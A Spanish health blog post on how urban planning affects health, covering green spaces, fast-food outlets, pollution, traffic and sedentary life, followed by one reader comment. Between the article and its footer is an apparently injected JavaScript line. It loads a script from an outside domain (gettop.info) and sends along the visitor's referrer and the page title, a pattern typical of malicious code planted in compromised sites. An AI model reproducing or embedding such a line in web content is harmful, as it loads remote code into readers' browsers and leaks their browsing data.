Salud y belleza » Salud, Sanidad

La ciudad perjudica a la salud

1 Comentario

Existen pequeños gestos cotidianos que pueden influir en nuestra salud: pasear, ir andando al trabajo, coger el coche… pero a menudo es el entorno el que nos enferma y por eso recientes investigaciones han puesto su foco de atención en nuestros barrios y ciudades para saber en qué medida estos pueden perjudicar nuestra salud e influir en aspectos como la tensión arterial, la función pulmonar o el riesgo de enfermedades.

ciudad-salud

Los expertos advierten de que a la hora de planificar de forma urbanística una ciudad, deberían definir qué se gana y qué se pierde en términos de salud. Por eso cada vez más intervienen en estos proyectos expertos de disciplinas como la sociología, la economía o el medioambiente.

Para estudiar cómo influye la geografía en la salud de los habitantes es conveniente analizar aspectos como los espacios verdes, el número de puntos de venta de tabaco, los carriles bici o los restaurantes de comida rápida. De hecho, hace poco se publicó un estudio en EEUU en el que se advertía de que los niños que vivían cerca de establecimientos de comida rápida tenían más riesgos de padecer obesidad.

Por otro lado, otros estudios demuestran que es beneficioso vivir cerca de espacios verdes para aliviar la ansiedad, mejorar la calidad de sueño, la salud cardiovascular, la longevidad, mortalidad o tasa de partos prematuros. Pero no se sabe realmente si esto se produce porque esas personas tienen menos estrés, realizan más actividad física o respiran menos contaminantes.

trafico-ciudad

Pero el problema reside en que solo el 25% de la población mundial reside en zonas rurales, aunque eso no basta para tener más salud puesto que el hecho de que resida en zonas no urbanas no quiere decir que esté más tiempo en espacios verdes. Además, no solo son importantes los espacios verdes, sino también las zonas urbanas para pasear. Por eso los expertos proponen convertir las ciudades en espacios donde la gente pueda ir de paseo despacio.

Por otro lado está la contaminación, que es causante de unas siete millones de muertes al año en el mundo. Por eso hay que repensar las ciudades para conseguir reducir el uso del coche y que las fábricas sean más respetuosas con el entorno. En algunos lugares como Copenhague se ha reorganizado el tráfico para promover el uso de la bicicleta, y lo han conseguido. El problema es que en la mayoría de las ciudades el tráfico se organiza pensando en evitar atascos, y no en favorecer la salud de los habitantes con menos contaminación y menos ruido.

espacios-verdes-ciudad

Las ciudades tampoco están diseñadas para hacer ejercicio en el día a día, lo que contribuye a aumentar las tasas de sedentarismo que a su vez incrementan el riesgo de padecer obesidad y problemas del corazón.

Por tanto, la conclusión radica en que hay que repensar las ciudades y reorganizarlas pensando en la salud y no en el tráfico o en el trabajo para poder mejorar la calidad de vida de sus habitantes.

¿Crees que el problema está en las ciudades?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , , ,

One Comment »

  • virginia said:

    por eso me gusta vivir un poco en las afueras, donde ha dado lugar a construir espacios verdes y muchos más parques, carriles bici y lugares para caminar.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.